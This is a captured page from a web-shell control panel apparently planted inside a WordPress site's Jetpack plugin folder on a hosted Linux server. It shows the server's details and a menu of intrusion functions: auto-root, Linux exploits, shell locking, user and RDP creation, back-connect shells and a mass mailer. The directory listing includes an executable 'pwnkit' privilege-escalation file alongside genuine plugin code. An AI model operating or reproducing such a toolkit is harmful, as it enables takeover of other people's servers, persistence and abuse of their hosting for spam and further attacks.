Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.180
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
plugins /
jetpack /
_inc /
[ HOME SHELL ]
Name
Size
Permission
Action
blocks
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
social-logos
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accessible-focus.js
620
B
-rw-r--r--
blogging-prompts.php
532
B
-rw-r--r--
class.jetpack-provision.php
9.7
KB
-rw-r--r--
connect-button.js
5.05
KB
-rw-r--r--
crowdsignal-shortcode.js
529
B
-rw-r--r--
crowdsignal-survey.js
277
B
-rw-r--r--
facebook-embed.js
1
KB
-rw-r--r--
gallery-settings.js
1
KB
-rw-r--r--
genericons.php
565
B
-rw-r--r--
jetpack-admin.js
1.54
KB
-rw-r--r--
jetpack-connection-banner.js
1.17
KB
-rw-r--r--
jetpack-deactivate-dialog.js
2.8
KB
-rw-r--r--
jetpack-modules.js
2.42
KB
-rw-r--r--
jetpack-modules.models.js
2.08
KB
-rw-r--r--
jetpack-modules.views.js
1.68
KB
-rw-r--r--
jetpack-recommendations-banner...
1.79
KB
-rw-r--r--
jetpack-server-sandbox.php
1.36
KB
-rw-r--r--
polldaddy-shortcode.js
1.92
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
social-logos.php
1014
B
-rw-r--r--
twitter-timeline.js
351
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : social-logos.php
<?php /** * Social Logos * Icon Font of the social logos we use on WordPress.com and in Jetpack * * Reference: https://github.com/Automattic/social-logos * * @package automattic/jetpack */ define( 'JETPACK_SOCIAL_LOGOS_URL', plugin_dir_url( __FILE__ ) . 'social-logos/' ); define( 'JETPACK_SOCIAL_LOGOS_DIR', plugin_dir_path( __FILE__ ) . 'social-logos/' ); /** * Globally registers the 'social-logos' style and font. * * This ensures any theme or plugin using it is on the latest version of Social Logos, and helps to avoid conflicts. */ function jetpack_register_social_logos() { if ( ! wp_style_is( 'social-logos', 'registered' ) ) { /** This filter is documented in modules/sharedaddy/sharing.php */ $post_fix = apply_filters( 'jetpack_should_use_minified_assets', true ) ? '.min' : ''; wp_register_style( 'social-logos', JETPACK_SOCIAL_LOGOS_URL . 'social-logos' . $post_fix . '.css', false, JETPACK__VERSION ); } } add_action( 'init', 'jetpack_register_social_logos', 1 );
Close